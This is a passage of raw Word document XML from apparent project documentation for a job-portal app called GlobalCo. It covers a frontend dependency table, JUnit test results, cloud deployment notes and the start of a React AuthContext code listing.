            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Declarative component-driven user interface library with Virtual DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>frontend/src/ (All UI views)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>vite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7.3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Native ESM development server and Rollup production bundler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Frontend dev server &amp; npm run build</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>tailwindcss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3.4.19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Utility-first CSS framework implementing custom Red &amp; White palette</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All frontend components &amp; styling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>axios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1.6.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Promise-based HTTP client with request and response interceptors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>frontend/src/services/api.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>lucide-react</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1296"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>0.344.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Lightweight SVG icon library with tree-shaking support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All UI components and buttons</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>26. Automated Testing Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Execution Verification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The project features automated backend unit and integration tests executed using JUnit 5 and Mockito. Live verification confirmed a 100% pass rate (11/11 tests passed with 0 failures and 0 errors):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>ApplicationServiceTest (3 tests): Validates 1-click application submission, duplicate prevention under repeated requests, and status transitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AuthServiceTest (2 tests): Verifies valid login, token generation, and password hash comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>CandidateProfileServiceTest (3 tests): Tests profile creation, skill updates, and profile retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>JobServiceTest (3 tests): Validates job search, keyword filtering, and candidate-job matching algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Frontend Build Verification: 'npm run build' executed cleanly via Vite, transforming 1840 modules into an optimized bundle with 0 errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>27. Deployment Architecture &amp; Cloud Strategy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>To deploy GlobalCo in an enterprise cloud environment (AWS, GCP, Azure, or Kubernetes):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Database Migration: Replace H2 with Amazon RDS MySQL 8.0 or PostgreSQL. Set spring.jpa.hibernate.ddl-auto=validate and execute Flyway migration scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Docker Multi-Stage Build: Containerize backend JAR using eclipse-temurin:21-jre-alpine and frontend build using nginx:alpine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>NGINX Ingress Gateway: Reverse proxy serving React SPA at / and routing /api requests to the Spring Boot backend cluster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Secret Management: Store JWT secrets and database passwords in AWS Secrets Manager or HashiCorp Vault.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Frontend Code Architecture, Component Tree &amp; Interceptor Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The React 18 single-page application is architected around a centralized AuthContext provider, declarative React Router v6 routing, and a unified Axios HTTP client configured with automated request and response interceptors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Global Authentication State: AuthContext.jsx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">State Architecture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>AuthContext provides global user identity, authorization roles, and session persistence across the entire React component tree. It synchronizes directly with the browser's localStorage to preserve login state across browser page refreshes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing: AuthContext.jsx - Centralized Authentication &amp; Session Store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9648"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9648"/>
            <w:shd w:fill="F1F5F9"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// In AuthContext.jsx:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>export const AuthContext = createContext(null);</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export const AuthProvider = ({ children }) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const [user, setUser] = useState(null);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const [token, setToken] = useState(localStorage.getItem('token'));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const [role, setRole] = useState(localStorage.getItem('role'));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  const [loading, setLoading] = useState(true);</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 xml:space="preserve">  useEffect(() =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    // Synchronize session on initial page mount</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    const storedToken = localStorage.getItem('token');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    const storedUser = localStorage.getItem('user');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    const storedRole = localStorage.getItem('role');</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (storedToken &amp;&amp; storedUser) {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      setToken(storedToken);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      setUser(JSON.parse(storedUser));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">      setRole(storedRole);</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 xml:space="preserve">    setLoading(false);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  }, []);</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 xml:space="preserve">  const login = (userData, authToken) =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    localStorage.setItem('token', authToken);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    localStorage.setItem('user', JSON.stringify(userData));</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    localStorage.setItem('role', userData.roles[0]);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setToken(authToken);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setUser(userData);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setRole(userData.roles[0]);</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 xml:space="preserve">  const logout = () =&gt; {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    localStorage.clear();</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setToken(null);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setUser(null);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    setRole(null);</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 xml:space="preserve">  return (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;AuthContext.Provider value={{ user, token, role, login, logout, loading, isAuthenticated: !!token }}&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
